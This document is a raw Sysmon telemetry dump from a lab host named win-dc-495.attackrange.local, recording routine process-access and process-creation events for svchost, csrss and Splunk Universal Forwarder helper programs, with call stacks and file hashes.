13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.188{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.156{59A5CD1D-9327-6005-CC04-00000000A301}44764992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:47.031{59A5CD1D-9327-6005-CC04-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.828{59A5CD1D-9328-6005-CE04-00000000A301}46721652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 